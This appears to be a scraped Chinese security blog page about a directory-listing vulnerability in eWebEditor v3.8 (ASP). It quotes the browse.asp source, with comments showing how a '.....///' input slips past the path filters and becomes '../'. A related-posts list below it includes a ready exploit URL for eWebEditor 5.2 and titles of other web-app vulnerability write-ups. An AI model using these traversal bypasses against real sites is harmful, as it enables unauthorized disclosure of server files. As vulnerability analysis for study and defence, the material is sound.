标题:asp eWebEditor v3.8 列目录漏洞(其他版本为测试)

漏洞文件:asp/browse.asp

漏洞产生:

Sub InitParam()

sType = UCase(Trim(Request.QueryString("type")))

sStyleName = Trim(Request.QueryString("style"))

sCusDir = Trim(Request.QueryString("cusdir"))

Dim i, aStyleConfig, bValidStyle

bValidStyle = False

For i = 1 To Ubound(aStyle)

aStyleConfig = Split(aStyle(i), "|||")

If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then

bValidStyle = True

Exit For

End If

Next

If bValidStyle = False Then

OutScript("alert('Invalid Style.')")

End If

sBaseUrl = aStyleConfig(19)

nAllowBrowse = CLng(aStyleConfig(43))

nCusDirFlag = Clng(aStyleConfig(61))

If nAllowBrowse <> 1 Then

OutScript("alert('Do not allow browse!')")

End If

If nCusDirFlag <> 1 Then

sCusDir = ""

Else

sCusDir = Replace(sCusDir, "", "/")

If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then

sCusDir = ""

Else

If Right(sCusDir, 1) <> "/" Then

sCusDir = sCusDir & "/"

End If

End If

End If

sUploadDir = aStyleConfig(3)

If Left(sUploadDir, 1) <> "/" Then

sUploadDir = "../" & sUploadDir

End If

Select Case sBaseUrl

Case "0"

sContentPath = aStyleConfig(23)

Case "1"

sContentPath = RelativePath2RootPath(sUploadDir)

Case "2"

sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))

End Select

sUploadDir = sUploadDir & sCusDir

sContentPath = sContentPath & sCusDir

Select Case sType

Case "FILE"

sAllowExt = ""

Case "MEDIA"

sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov"

Case "FLASH"

sAllowExt = "swf"

Case Else

sAllowExt = "bmp|jpg|jpeg|png|gif"

End Select

sCurrDir = sUploadDir

sDir = Trim(Request("dir"))

'1.假设dir= ../

'2.假设dir=...//

'3.假设dir=.....///

sDir = Replace(sDir, "", "/") '过滤1

sDir = Replace(sDir, "../", "") '过滤2

'1.到这里就被过滤了

sDir = Replace(sDir, "./", "") '过滤3

'2到这里也被功率了

'3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。[/color]

If sDir <> "" Then

If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then

sCurrDir = sUploadDir & sDir & "/"

Else

sDir = ""

End If

End If

End Sub

漏洞发生者:鬼哥

ewebeditor 3.8php漏洞,eWebEditor v3.8 列目录漏洞【asp版本】相关推荐

  1. ewebeditor 5.2 列目录漏洞

    利用方法如下 http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=-././/.. 由于st0p测试的时候, ...

  2. 审查元素上传php,KindEditor上传解析漏洞/列目录/内容漏洞_PHP教程

    本文章来给大家介绍一下关于KindEditor上传解析漏洞/列目录/内容漏洞分析,有需要的朋友快速补上吧. Kindeditor漏洞 编辑代码内容被执行 kindeditor漏洞描述:在kindedi ...

  3. phpcmsV9SQL注射+列目录

    漏洞作者: kobin97 提交时间: 2012-01-20 公开时间: 2012-01-25 漏洞文件:phpcms\modules\p_w_upload\p_w_uploads.php SQL注射 ...

  4. CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现

    目录 1. 简介 2. 影响范围 3. 环境搭建 3.1 安装Composer 4. 漏洞复现 4.1 列举目录 4.2 任意文件读取 1. 简介 ThinkAdmin 是基于 ThinkPHP后台开 ...

  5. ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建

    ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏 ...

  6. fckeditor漏洞_一、Ewebeidtor编辑器漏洞

    一.Ewebeidtor编辑器漏洞 eWebEditor是基于浏览器的.所见即所得的在线HTML编辑器.它能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能. 1.Ewebeid ...

  7. html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过

    常用的编辑器 常见的编辑器有Ewebeditor  fckeditor  CKeditor kindeditor 1.Ewebeditor 测试环境用的是eWebEditor_v216_Free版本  ...

  8. 索尼推出 PlayStation 漏洞奖励计划,最严重漏洞5万美元起步

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 索尼宣布推出 PlayStation漏洞公开奖励计划,奖励安全研究员和玩家在 PlayStation 4 设备和 PlayStatio ...

  9. 目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞

    目录 目录浏览(目录遍历)漏洞 任意文件读取/下载漏洞 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件 ...

  10. struts2漏洞_十大常见web漏洞——命令执行漏洞

    命令执行漏洞在不同框架下都有存在,也是十分普遍且危害极大,下面我们介绍一个最具代表性的,也是影响范围最大的一个命令执行漏洞--Struts2远程代码执行漏洞. Struts2 漏洞介绍 ApacheS ...

最新文章

  1. 网络推广——网络推广专员浅析网站建设中少不了对细节的关注
  2. azdb文件怎么打开_AZDBMappingSvcs.dll
  3. 微信小程序uni.switchTab传参获取不到;小程序跳转到tabBar页并传参;uni-app微信小程序获取tabBar页面参数失败;uni-app微信小程序tabBar页面onLoad不执行
  4. SCSF 系列:Smart Client Software Factory 与 ObjectBuilder
  5. Django框架架构总览
  6. 代理 设置wsl_为 WSL2 一键设置代理
  7. 为大家提供几个开发职位
  8. Apache配置站点与虚拟目录
  9. 傻瓜式长文详细教程:无需u盘装系统(ubuntu、deepin双系统等)
  10. 转易语言-网页游戏辅助,网络游戏辅助,手游辅助开发技术教程
  11. CTFshow web入门——php特性
  12. html5小米手机调用摄像头,html5摄像头 如何调用手机摄像头
  13. 刚工作2年时15k运维工程师-简历
  14. 软件观念革命:交互设计精髓_UI设计师、交互设计师、产品经理必备软件技能之Sketch...
  15. 植物大战僵尸——最强阵容
  16. 36招搞定电脑一切难题!!!
  17. JDK 8 JVM性能优化
  18. 数据结构实验报告,二叉树的基本操作(C语言)
  19. 微信小程序web-view使用audio标签播放音频文件时无法自动播放的问题
  20. Linux:安装和配置tomcat详细教程

热门文章

  1. ElasticSearch搜索引擎搭建笔记
  2. java 线程 设计模式_Java多线程设计模式(四)
  3. mindmanager2020许可密钥永久激活破解安装教程非破解手机版下载
  4. pcd 地图转 栅格地图
  5. 安全赋能区域数字化转型,普陀区副区长徐树杰带队调研上海控安
  6. 计算机网络保密承诺书,保密承诺书集合5篇
  7. python360_Python实现360账号登录
  8. 微信公众平台接口API
  9. 微服务集成skywalking实现全链路日志追踪方案
  10. kubernetes中容器(pod)间的通信及环境变量设置